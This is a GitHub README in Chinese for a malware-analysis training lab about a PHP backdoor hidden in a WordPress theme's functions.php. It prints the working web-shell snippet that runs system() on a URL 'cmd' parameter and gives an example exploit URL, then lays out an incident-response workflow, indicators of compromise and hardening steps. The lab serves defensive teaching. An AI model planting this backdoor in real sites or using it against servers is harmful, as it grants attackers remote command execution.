Hunter-Motiur/wordpress-backdoor-analysis-lab
GitHub: Hunter-Motiur/wordpress-backdoor-analysis-lab
一个用于练习 WordPress PHP 后门分析与事件响应流程的实操培训实验室。
Stars: 0 | Forks: 0
# WordPress 后门分析实验室
## 概述
本仓库记录了一次模拟的 WordPress 恶意软件调查,重点在于识别和分析隐藏在 WordPress 主题中的 PHP 后门。
这是一个旨在提高恶意软件分析和事件响应技能的实操培训实验室。
# 实验室信息
**类型:** 恶意软件分析实验室
**难度:** 中级
**平台:** WordPress
**语言:** PHP
# 场景
在一次恶意软件调查中,在以下位置发现了可疑的 PHP 代码:
```
wp-content/themes/twentytwentyfour/functions.php
```
代码如下所示:
```
add_action('init', function () {
if(isset($_GET['cmd'])){
system($_GET['cmd']);
}
});
```
# 初步评估
该代码似乎是一个 PHP 后门,因为它直接通过用户控制的 URL 参数执行操作系统命令。
这种行为不属于正常的 WordPress 功能。
# 技术分析
## 文件位置
```
wp-content/themes/twentytwentyfour/functions.php
```
## 可疑函数
```
system()
```
用途:
在服务器上执行操作系统命令。
## Hook
```
add_action('init')
```
用途:
在 WordPress 每次初始化时运行。
## 用户输入
```
$_GET['cmd']
```
用途:
直接从 URL 接收命令输入。
# 可能的攻击
示例:
```
https://example.com/?cmd=id
```
攻击者的潜在能力:
- 执行系统命令
- 读取敏感文件
- 删除文件
- 上传额外的恶意软件
- 下载网站数据
- 创建持久性
- 篡改网页
# 调查工作流
1. 保留原始文件。
2. 创建取证副本。
3. 审查可疑的 PHP 函数。
4. 与干净的主题进行对比。
5. 搜索额外的后门。
6. 审查 Web 服务器日志。
7. 识别入侵指标 (IOC)。
8. 移除恶意代码。
9. 验证清理是否成功。
10. 执行安全加固。
# 入侵指标
- 出乎意料的 system() 使用
- 可疑的 init hook 使用
- 用户控制的命令执行
- 被修改的 functions.php
# 安全加固
- 更新 WordPress 核心
- 更新插件
- 更新主题
- 移除未使用的插件
- 重置密码
- 检查文件权限
- 安装安全插件
- 禁用文件编辑
# 展示的技能
- WordPress 恶意软件分析
- PHP 代码审查
- 事件响应
- IOC 识别
- 人工恶意软件检测
- 安全加固
# 经验教训
- 永远不要信任用户输入。
- 在清理前保留证据。
- 人工验证是必不可少的。
- 务必调查根本原因。
- 搜索其他的持久化机制。
# 状态
已完成
实验室模拟
标签:DAST, OpenVAS, PHP, WebShell分析, WordPress, 安全实验, 库, 应急响应, 恶意软件分析, 搜索语句(dork), 文件完整性监控